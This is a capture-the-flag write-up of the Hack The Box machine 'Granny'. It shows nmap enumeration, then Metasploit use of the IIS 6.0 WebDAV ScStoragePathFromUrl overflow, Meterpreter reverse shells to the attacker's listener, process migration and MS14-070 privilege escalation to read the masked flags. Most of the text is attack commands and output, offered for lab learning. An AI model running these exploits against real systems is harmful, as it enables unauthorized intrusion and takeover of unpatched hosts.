Granny is an easy box windows box that was released back in April 2017.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ root [ 10.10.14.48/23 ] [ech0/_HTB/Granny] → nmap -sC -sV 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 17:45 CET Nmap scan report for 10.10.10.15 Host is up (0.036s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Server Type: Microsoft-IIS/6.0 | Server Date: Mon, 11 Nov 2019 16:48:07 GMT | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH |_ WebDAV type: Unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
As you can see we're dealing with IIS 6.0 which is an outdated version, with a ton of scripts for us to use, so let's fire up msfconsole :
msfconsole ___ ____ ,-"" `. < HONK > ,' _ e )`-._ / ---- / ,' `-._<.===-' / / / ; _ / ; (`._ _.-"" ""--..__,' | <_ `-"" \ <`- : (__ <__. ; `-. '-.__. _.' / \ `-.__,-' _,' `._ , /__,-' ""._\__,'< <____ | | `----.`. | | \ `. ; |___ \-`` \ --< `.`.< `-' =[ metasploit v5.0.74-dev ] + -- --=[ 1969 exploits - 1088 auxiliary - 338 post ] + -- --=[ 558 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] msf5 > update [*] exec: update [*] You have the latest version of Pwntools (4.0.1) msf5 > search scstorage Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15 RHOSTS => 10.10.10.15 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit [*] Started reverse TCP handler on 10.10.14.10:4444 [*] Sending stage (180291 bytes) to 10.10.10.15 [*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.15:1036) at 2020-02-19 08:38:49 +0000 [*] Sending stage (180291 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.10:4444 -> 10.10.10.15:1037) at 2020-02-19 08:38:51 +0000 [-] Exploit aborted due to failure: bad-config: Server did not respond correctly to WebDAV request [*] Exploit completed, but no session was created. msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit [*] Started reverse TCP handler on 10.10.14.10:4444 [*] Trying path length 3 to 60 ... [*] Sending stage (180291 bytes) to 10.10.10.15 [*] Meterpreter session 3 opened (10.10.14.10:4444 -> 10.10.10.15:1038) at 2020-02-19 08:39:22 +0000 meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 208 348 logon.scr 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 604 396 svchost.exe 676 396 svchost.exe 732 396 svchost.exe 776 396 svchost.exe 796 396 svchost.exe 932 396 spoolsv.exe 960 396 msdtc.exe 1080 396 cisvc.exe 1128 396 svchost.exe 1176 396 inetinfo.exe 1212 396 svchost.exe 1328 396 VGAuthService.exe 1408 396 vmtoolsd.exe 1456 396 svchost.exe 1504 3620 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe 1596 396 svchost.exe 1696 396 alg.exe 1824 604 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1908 396 dllhost.exe 2060 3620 svchost.exe x86 0 C:\WINDOWS\Temp\radA77E9.tmp\svchost.exe 2304 604 wmiprvse.exe 2380 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad64DF6.tmp\svchost.exe 2928 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad3C906.tmp\svchost.exe 3396 1080 cidaemon.exe 3440 1080 cidaemon.exe 3480 1080 cidaemon.exe 3620 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 3692 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
and we get a reverse shell ! but we need to migrate to another process in order to escalate privileges : the process number 1824 looks interesting :
meterpreter > migrate 1824 [*] Migrating from 1504 to 1824... [*] Migration completed successfully. meterpreter > shell Process 2080 created. Channel 3 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd ../.. ccd ../.. C:\>d Documents And Settings cd Documents And Settings C:\Documents and Settings>cd Administrator cd Administrator Access is denied.
And as you can see, we still migrated to NT Authority, but we did not escalate our privileges enough.
C:\Documents and Settings>exit meterpreter > background [*] Backgrounding session 3... msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search ms14_070 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 3 SESSION => 3 msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > show options Module options (exploit/windows/local/ms14_070_tcpip_ioctl): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 3 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Server 2003 SP2 msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.10 LHOST => 10.10.14.10 msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run
We'll use a local exploit on our backgrounded session, to see if we can escalate privileges.
[*] Started reverse TCP handler on 10.10.14.10:4444 [*] Storing the shellcode in memory... [*] Triggering the vulnerability... [*] Checking privileges after exploitation... [+] Exploitation successful! [*] Sending stage (180291 bytes) to 10.10.10.15 [*] Meterpreter session 4 opened (10.10.14.10:4444 -> 10.10.10.15:1039) at 2020-02-19 08:44:38 +0000 meterpreter > shell [-] Unknown command: shell. meterpreter > shell Process 3108 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>meterpreter > meterpreter > shell Process 3140 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd c:\ cd c:\ C:\>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\ 04/12/2017 04:27 PM <DIR> ADFS 04/12/2017 04:04 PM 0 AUTOEXEC.BAT 04/12/2017 04:04 PM 0 CONFIG.SYS 04/12/2017 09:19 PM <DIR> Documents and Settings 04/12/2017 04:17 PM <DIR> FPSE_search 04/12/2017 04:17 PM <DIR> Inetpub 12/24/2017 07:21 PM <DIR> Program Files 12/24/2017 07:30 PM <DIR> WINDOWS 04/12/2017 04:05 PM <DIR> wmpub 2 File(s) 0 bytes 7 Dir(s) 18,090,029,056 bytes free C:\>cd Documents and Settings cdcd Documents and Settings C:\Documents and Settingcd Administrator cd Administrator C:\Documents and Settings\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings\Administrator 04/12/2017 08:48 PM <DIR> . 04/12/2017 08:48 PM <DIR> .. 04/12/2017 04:28 PM <DIR> Desktop 04/12/2017 04:12 PM <DIR> Favorites 04/12/2017 04:12 PM <DIR> My Documents 04/12/2017 03:42 PM <DIR> Start Menu 04/12/2017 03:44 PM 0 Sti_Trace.log 1 File(s) 0 bytes 6 Dir(s) 18,090,029,056 bytes free C:\Documents and Settings\Administrator>cd Desktop cd Desktop C:\Documents and Settings\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings\Administrator\Desktop 04/12/2017 04:28 PM <DIR> . 04/12/2017 04:28 PM <DIR> .. 04/12/2017 09:17 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 18,090,029,056 bytes free C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt aaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX C:\WINDOWS\system32>cd C:\Documents and Settings\Lakis\Desktop cd C:\Documents and Settings\Lakis\Desktop C:\Documents and Settings\Lakis\Desktop>type user.txt type user.txt 70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to root the box, getting both the user and the root flag in one go. :)
Here we can see the progress graph :